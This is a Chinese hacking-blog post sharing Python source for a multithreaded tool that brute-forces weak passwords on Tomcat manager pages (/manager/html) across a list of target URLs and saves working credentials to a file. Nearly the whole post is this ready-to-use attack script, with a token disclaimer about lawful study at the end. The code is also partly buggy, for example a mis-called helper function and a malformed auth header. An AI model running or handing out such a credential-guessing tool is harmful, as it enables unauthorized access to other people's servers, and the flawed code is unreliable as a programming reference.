tomcat批量弱口令爆破工具(py版)附带源码

  • 内容
  • 相关

20170222092532326.jpg

 

#!/usr/bin/env python 
 # -*- coding: utf-8 -*- 
 import sys 
 import requests 
 import threading 
 import Queue 
 import time 
 import base64 
 import os 
 #headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+[url]http://www.googlebot.com/bot.html[/url])'} 
 u=Queue.Queue() 
 p=Queue.Queue() 
 n=Queue.Queue() 
 #def urllist() 
 urls=open('url.txt','r') 
 def urllist(): 
     for url in urls: 
         url=url.rstrip() 
         u.put(url) 
 def namelist(): 
     names=open('name.txt','r') 
     for name in names: 
         name=name.rstrip() 
         n.put(name) 
    
 def passlist(): 
     passwds=open('pass.txt','r') 
     for passwd in passwds: 
         passwd=passwd.rstrip() 
         p.put(passwd) 
    
 def weakpass(url): 
     namelist() 
     while not n.empty(): 
         name =n.get() 
         #print name 
         passlist() 
         while not p.empty(): 
             good() 
             #name = n.get() 
             passwd = p.get() 
             #print passwd 
             headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))} 
             try: 
                 r =requests.get(url,headers=headers,timeout=3) 
                 #print r.status_code 
                 if r.status_code==200: 
                     print '[turn] ' +url+' '+name+':'+passwd 
                     f = open('good.txt','a+') 
                     f.write(url+' '+name+':'+passwd+'\n') 
                     f.close() 
                 else: 
                     print '[false] ' + url+' '+name+':'+passwd 
             except: 
                 print '[false] '  + url+' '+name+':'+passwd 
    
 def list(): 
     while u.empty(): 
         url = u.get() 
         weakpass(name,url) 
    
 def thread(): 
     urllist() 
     tsk=[] 
     for i in open('url.txt').read().split('\n'): 
         i = i + '/manager/html' 
         t = threading.Thread(target=weakpass,args=(i,)) 
         tsk.append(t) 
     for t in tsk: 
         t.start() 
         t.join(1) 
         #print "current has %d threads" % (threading.activeCount() - 1) 
 def good(): 
     good_ = 0 
     for i in open('good.txt').read().split('\n'): 
         good_+=1 
     os.system('title "weakpass------good:%s"' % (good_)) 
    
 if __name__=="__main__": 
    # alllist() 
     thread() 

 

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:本文已被百度收录! | [360未收录] | [搜狗已收录]

本文链接:tomcat批量弱口令爆破工具(py版)附带源码 - https://www.0dayhack.com/post-104.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

sitemap